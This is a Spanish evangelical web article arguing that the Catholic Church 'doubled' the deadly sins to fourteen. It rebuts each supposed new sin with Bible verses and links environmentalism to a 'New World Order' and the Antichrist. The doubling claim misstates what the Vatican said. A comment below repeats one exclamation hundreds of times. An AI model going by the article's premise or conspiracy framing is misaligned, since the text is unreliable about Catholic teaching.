Avisar de contenido inadecuado

Los catorce pecados mortales de la iglesia de Roma

{
}

 

LOS "CATORCE PECADOS MORTALES" DEL CATOLICISMO ROMANO

 

La Paga Del Pecado Es Muerte (Romanos 6:23a)

 

La Iglesia Católica-Romana y su Papa una vez más han hecho algo que se desvía drásticamente de las Escrituras. En el último pronunciamiento del Vaticano, el Papa Benedicto XVI duplicó el número de "pecados mortales" al añadir siete más a la lista original de orgullo, envidia, gula, avaricia, lujuria, ira y pereza. Las adiciones nuevas incluyen contaminar el medioambiente, ingeniería genética, riquezas obscenas, uso de drogas, aborto, pedo-filia, y causar injusticia social.

La doctrina tradicional Católica divide los pecados en mortales y veniales (menores) y sostiene que los pecados mortales, si no hay arrepentimiento, llevan a condenación eterna. Pero como señala nuestro subtítulo, la Biblia dice que la paga del pecado (en singular) es muerte espiritual eterna. Eso significa que desde el punto de vista de Dios, los tales "pecados menores" no son diferentes a los "pecados mortales" en lo que concierne al castigo:

"He aquí que todas las almas son mías; como el alma del padre, así el alma del hijo es mía; el alma que pecare, esa morirá." Ezequiel 18:4

Por favor, note que aquí no se mencionan ni grados ni especificaciones - ¡solo una llana y declarada realidad que todos los que pecan ha de morir! Y conocemos de las enseñanzas del Señor Jesucristo en el Nuevo Testamento que la máxima penalidad para el pecado es la condenación eterna.

¡Y lo que muchos no entienden es que una sencilla desviación de la perfección demandada por la santidad y justicia de Dios es PECADO!

¡Por lo que, cuanto más rápido captemos esa realidad en nuestras mentes, mucho mejor! Usted y yo, junto con todos los demás en el planeta somos pecadores porque ninguno de nosotros somos perfectos. Y de la misma manera en que decir una mentira lo hace a uno mentiroso, cometer un pecado bien pequeñito lo hace a uno pecador y nos coloca bajo la sentencia de Dios de muerte eterna. 

"Se apartaron los impíos desde la matriz; Se descarriaron hablando mentira desde que nacieron." Salmos 58:3

Sin embargo, nuestra intención no es entrar en una discusión sobre el pecado y el perdón, porque ese tópico ha sido cubierto en un artículo anterior:

www.cuttingedge.org/sp/p191.htm

 

Démosle un vistazo de cerca a la más reciente lista de pecados mortales de Roma y notemos algunos aspectos que hablan bastante sobre la dirección en la que ella está llevando a sus fieles adherentes.

 

Primero y antes que todo, el "nuevo" pecado de contaminar al medioambiente eleva por lo menos una pregunta teológica importante así como otras concernientes al lineamiento obvio con la agenda ambientalista "verde" del Nuevo Orden Mundial que está siendo presentemente implementada por gobiernos alrededor del planeta. Ya que la Biblia no menciona el tema de la contaminación directamente y ni siquiera en principio, ¿de dónde o con qué autoridad consiguió el Papa el mensaje de que ahora es pecado? El problema ha existido por siglos y entonces ¿por qué de repente se convirtió en pecado y por qué no era un pecado el año pasado?  ¿Cambió Dios de opinión y se lo dejó saber al Papa para que el pudiera esparcir el mensaje?

 

"Porque yo Jehová no cambio; por esto, hijos de Jacob, no habéis sido consumidos." Malaquías 3:6

 

"Jesucristo es el mismo ayer, y hoy, y por los siglos." Hebreos 13:8

 

Toda buena dádiva y todo don perfecto desciende de lo alto, del Padre de las luces, en el cual no hay mudanza, ni sombra de variación. Santiago 1:17

 

Todo lo que Dios quiere que Su pueblo conozca sobre el pecado y la salvación está contenido dentro de las páginas de la Biblia. Y todos quienes se atrevan a añadirle o a quitarle (Papas, "profetas" Mormones, Testigos de Jehová, etc.) serán juzgados duramente: (Todas las citas son de la Reina-Valera 1960 y los énfasis son nuestros).

"No añadiréis a la palabra que yo os mando, ni disminuiréis de ella, para que guardéis los mandamientos de Jehová vuestro Dios que yo os ordeno." Deuteronomio 4:2

"Cuidarás de hacer todo lo que yo te mando; no añadirás a ello, ni de ello quitarás." Deuteronomio 12:32

"Toda palabra de Dios es limpia; El es escudo a los que en él esperan. No añadas a sus palabras, para que no te reprenda, Y seas hallado mentiroso. Proverbios 30:5-6

"Así ha dicho Jehová: Ponte en el atrio de la casa de Jehová, y habla a todas las ciudades de Judá, que vienen para adorar en la casa de Jehová, todas las palabras que yo te mandé hablarles; no retengas palabra." Jeremías 26:2

"Yo testifico a todo aquel que oye las palabras de la profecía de este libro: Si alguno añadiere a estas cosas, Dios traerá sobre él las plagas que están escritas en este libro. Y si alguno quitare de las palabras del libro de esta profecía, Dios quitará su parte del libro de la vida, y de la santa ciudad y de las cosas que están escritas en este libro." Apocalipsis 22:18-19

En lo que concierne al nuevo pecado de "riquezas obscenas", debemos preguntar, ¿en qué punto se vuelve obscena la riqueza? ¿Quiénes o qué hará esa determinación y sobre que autoridad se basará? Cuando un reportero en el programa de noticias "Nightline" de ABC (10 de Octubre, 2008), estaba discutiendo la lista de pecados adicionales aprovechó la oportunidad de tirarle un gancho a ¡la opulencia y gran riqueza de la misma Iglesia Católica! ¡Después de todo, aquellos que viven en casas de vidrio.....!

 

A continuación, está el pecado de "causar injusticia social." ¿Quién va a definir lo que significa y el momento preciso en el cual será violado? ¿Quién hará lo mismo por las riquezas obscenas o contaminar el medioambiente? Respuesta: La Iglesia Católico-Romana sobre su propia autoridad y no la Palabra de Dios.

 

¿Y qué de la ingeniería genética? Si bien es cierto que  jugar con la naturaleza tiene el potencial para un gran mal ético y moral, ¿es necesario generalizar toda la rama de estudio y condenarla? Una vez más el Vaticano asume la autoridad sobre un principio que la Biblia no enseña. 

 

Y concerniente al "consumo de drogas", se asume que esto se refiere al uso ilegal-estamos de acuerdo que definitivamente es un comportamiento pecaminoso ¡Pero usted puede hasta apostar su casa de que la Iglesia Católica-Romana (ICR) no lo extenderá para incluir el abuso del alcohol! ¿Cuál el la diferencia esencial? Al menos que las estadísticas hayan cambiado drásticamente durante los últimos pocos años, el abuso de alcohol continúa estando en el tope de la lista en lo concerniente a la pérdida financiera de los negocios/industrias. Se dice que ahora le cuesta a las empresas americanas como $134 billones en pérdidas de productividad nacionalmente cada año. Los alcohólicos y bebedores problemáticos se ausentan del trabajo de 4 a 8 veces más que empleados normales. Cuando si se presentan, los que abusan de sustancias son menos productivos en un 33%. Es más, hasta 40 por ciento de fatalidades industriales pueden ser ligadas al abuso de alcohol. Entre 38 y 50 por ciento de todas las reclamaciones de compensación al trabajador son relacionadas al abuso de sustancias ¿Entonces por qué no debe esto calificar como tan pecaminoso como el abusar de otro tipo de drogas? Este es solo un ejemplo de cómo la ICR fracasa en hacer lo suficiente para condenar el pecado.

 

Un ejemplo perfecto de que la ICR no está yendo lo suficientemente lejos y está haciendo muy poco, es la pedo-filia-el abuso sexual de niños. Porque como todos saben, este ha sido un escándalo mundial sobre sacerdotes católicos molestando a niños en años recientes ¡y aún así, ahora es que el Papa decidió que ese comportamiento es un pecado mortal! Una vez más, debemos hacer la pregunta obvia: ¿por qué no fue considerado un pecado mortal en el pasado?

 

Finalmente, llegamos al pecado del aborto. Aunque se está de acuerdo que en la basta mayoría de los casos el aborto no es más que asesinato legalizado, hay algunos casos-tales como el terminar la vida de un infante para salvar la vida de la madre-en cuyo caso no es asesinato. Matar si, asesinar no, porque las Escrituras hacen una distinción entre las dos. El mandamiento de Dios "No matarás", se refiere claramente a la prohibición contra el asesinato porque en muchas instancias El mandó al ejército de Israel a matar hombres, mujeres y niños. También el Rey David mandó a sus hombres a matar personas específicas sin sufrir el reproche de Dios. Por lo tanto, en esto, como lo es en el caso de muchas otras cosas, el Vaticano va más lejos de lo que se enseña en la Biblia. 

 

Por lo que deseamos decirles a los buenos católicos de todo el mundo, que no somos sus enemigos y nos pesa grandemente que exista una ambigüedad tan amplia por parte de su liderazgo espiritual. Ellos literalmente están inventando las reglas (lo que han hecho por más de dos mil años) para mantenerlos en un estado perpetuo de temor y esclavitud. Por eso es que el Señor Jesucristo dijo esto sobre los Fariseos, el equivalente en el Nuevo Testamento de su sacerdocio y jerarquía Papal:

 

"Pues en vano me honran, Enseñando como doctrinas mandamientos de hombres." Marcos 7:7

 

El también dijo algo concerniente a la autoridad sacerdotal que usted debería considerar:

"Y no llaméis padre vuestro a nadie en la tierra; porque uno es vuestro Padre, el que está en los cielos."

El amor a Jesucristo es lo que impulsa a los creyentes a obedecer Sus mandamientos, ¡mientras que el temor es el arma de los sacerdotes! Siempre  que hombres impíos se han colocado a la fuerza en una posición para ejercer autoridad espiritual sobre otros, ellos siempre se aseguran que tal poder permanezca inquebrantado. ¡Y la amenaza de excomulgación/condenación eterna para cualquiera que se atreva a cuestionar su autoridad continua siendo un arma excelente! (Los Católicos-Romanos ciertamente no están solos en esto, porque los mormones tienen el mismo problema).

Todos aquellos que verdaderamente han puesto su fe en la sangre derramada de Jesucristo para salvarlos del castigo del pecado han sido perdonados por Dios el Padre y nunca serán colocados en lo que los sistemas legales llaman la "amenaza de doble riesgo." Y esa maravillosa realidad acaba completamente con la "espada de Damocles" de que una jerarquía religiosa quiere sostener sobre su cabeza en esclavitud temerosa a sus caprichosos antojos.

 

Un caso a referir involucra la necesidad de que una persona se arrepienta (varias veces) de los llamados pecados mortales para así poder entrar al cielo cuando muera. Este requisito repetitivo, junto con la confesión y una hueste de otras cargas relacionadas que no tienen absolutamente nada de base Bíblica, ¡son anuladas en Jesucristo! El arrepentirse de nuestros pecados es una parte necesaria del nuevo nacimiento, pero en lo que concierne a la salvación eterna en sí misma el arrepentimiento solo se requiere una vez. De ahí en adelante, los pecados cometidos por un creyente (si continuamos pecando) son aquellos contra un Padre celestial y no el Juez Supremo del Universo. El arrepentimiento será necesario para permanecer en un caminar no quebrantado de comunión con nuestro Salvador, pero los fracasos de no hacerlo no tienen ningún peso sobre nuestra posición en Cristo. La diferencia se debe al hecho de que la corrección es el castigo para hijos desobedientes, ¡y no la condenación eterna!

 

Así que, por favor, ponga a un lado cualquier animosidad o desconfianza que usted pudiera tener sobre este mensaje y pregúntese honestamente si ¿realmente confía usted en otra persona que no sea el mismo Señor Jesucristo para poner las reglas de si usted irá o no al cielo cuando muera? Además, ¿cree usted realmente que cualquier mortal o cualquier grupo mortal debería tener esa autoridad? Yo puedo asegurarles que ¡la Biblia enseña claramente que no la debe de tener! Así que, permítanme urgirles amorosamente a que estudien por sí mismos las Escrituras del Nuevo Testamento y pídanle al Espíritu Santo que los guíe mientras tratan de discernir la verdad.

Si usted ha aceptado a Jesucristo como su Salvador personal, pero ha sido muy tibio en su caminar espiritual con El, usted necesita pedirle inmediatamente perdón y renovación. El lo perdonará instantáneamente, y llenará su corazón con el gozo del Espíritu Santo. Entonces, necesita iniciar un caminar diario de oración y estudio personal de la Biblia.

Si usted nunca ha aceptado a Jesucristo como Salvador, pero ha comprendido Su realidad y el Fin de los Tiempos que se acerca, y quiere aceptar Su regalo GRATIS de la Vida Eterna, usted puede hacerlo ahora, en la privacidad de su hogar. Una vez lo acepte a El como Salvador, usted habrá Nacido de Nuevo, y tendrá el Cielo tan seguro como si ya estuviera allí. Entonces, podrá descansar seguro de que el Reino del Anticristo no lo tocará espiritualmente.

Si a usted le gustaría Nacer de Nuevo,  vaya ahora a nuestra Página de Salvación .

Esperamos que haya sido bendecido por este ministerio, que busca educar y advertir a las personas, de modo que puedan ver el Nuevo Orden Mundial por venir -el Reino del Anticristo-en sus  noticias diarias.  

Finalmente, nos encantaría saber de usted. Puede enviarnos un E-Mail a 

Dios le bendiga.

 

{
}
{
}

Comentarios Los catorce pecados mortales de la iglesia de Roma

mateo 1:7

nestor hugo gordoa g nestor hugo gordoa g 22/02/2010 a las 06:25



!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 


!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 






!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 






!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!! 




!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
!!!!arriva dios padre!!!!
